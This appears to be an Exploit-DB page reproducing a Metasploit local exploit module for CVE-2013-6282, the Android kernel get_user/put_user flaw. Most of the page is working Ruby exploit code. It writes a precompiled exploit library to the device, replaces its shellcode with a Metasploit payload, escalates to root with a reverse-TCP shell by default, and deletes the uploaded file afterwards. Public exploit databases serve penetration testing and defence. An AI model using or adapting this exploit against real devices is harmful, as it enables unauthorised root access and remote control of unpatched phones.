Google Android - get_user/put_user (Metasploit)

EDB-ID:

40975

CVE:

2013-6282

EDB Verified:

Author:

Metasploit

Type:

local

Exploit:   /  

Platform:

Android

Date:

2016-12-29

Vulnerable App: 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex'

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Common

  def initialize(info={})
    super( update_info( info, {
        'Name'           => "Android get_user/put_user Exploit",
        'Description'    => %q{
            This module exploits a missing check in the get_user and put_user API functions
            in the linux kernel before 3.5.5. The missing checks on these functions
            allow an unprivileged user to read and write kernel memory.
                This exploit first reads the kernel memory to identify the commit_creds and
            ptmx_fops address, then uses the write primitive to execute shellcode as uid 0.
            The exploit was first discovered in the wild in the vroot rooting application.
        },
        'License'        => MSF_LICENSE,
        'Author'         => [
          'fi01',        # libget_user_exploit / libput_user_exploit
          'cubeundcube', # kallsyms_in_memory
          'timwr',       # Metasploit module
        ],
        'References'     =>
        [
          [ 'CVE', '2013-6282' ],
          [ 'URL', 'http://forum.xda-developers.com/showthread.php?t=2434453' ],
          [ 'URL', 'https://github.com/fi01/libget_user_exploit' ],
          [ 'URL', 'http://forum.xda-developers.com/showthread.php?t=2565758' ],
        ],
        'DisclosureDate' => "Sep 06 2013",
        'SessionTypes'   => [ 'meterpreter' ],
        "Platform"       => [ "android", "linux" ],
        'Targets'        => [[ 'Automatic', { }]],
        'Payload'        => { 'Space'    => 2048, },
        'DefaultOptions' =>
        {
          'WfsDelay'     => 120,
          'PAYLOAD'      => 'linux/armle/mettle/reverse_tcp',
        },
        'DefaultTarget' => 0,
      }
    ))
  end

  def exploit
    local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2013-6282.so" )
    exploit_data = File.read(local_file, {:mode => 'rb'})

    space = payload_space
    payload_encoded = payload.encoded

    # Substitute the exploit shellcode with our own
    exploit_data.gsub!("\x90" * 4 + "\x00" * (space - 4), payload_encoded + "\x90" * (payload_encoded.length - space))

    workingdir = session.fs.dir.getwd
    remote_file = "#{workingdir}/#{Rex::Text::rand_text_alpha_lower(5)}"
    write_file(remote_file, exploit_data)

    print_status("Loading exploit library #{remote_file}")
    session.core.load_library(
        'LibraryFilePath' => local_file,
        'TargetFilePath'  => remote_file,
        'UploadLibrary'   => false,
        'Extension'       => false,
        'SaveToDisk'      => false
    )
    print_status("Loaded library #{remote_file}, deleting")
    session.fs.file.rm(remote_file)
    print_status("Waiting #{datastore['WfsDelay']} seconds for payload")
  end

end
Tags: Metasploit Framework (MSF) Local
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services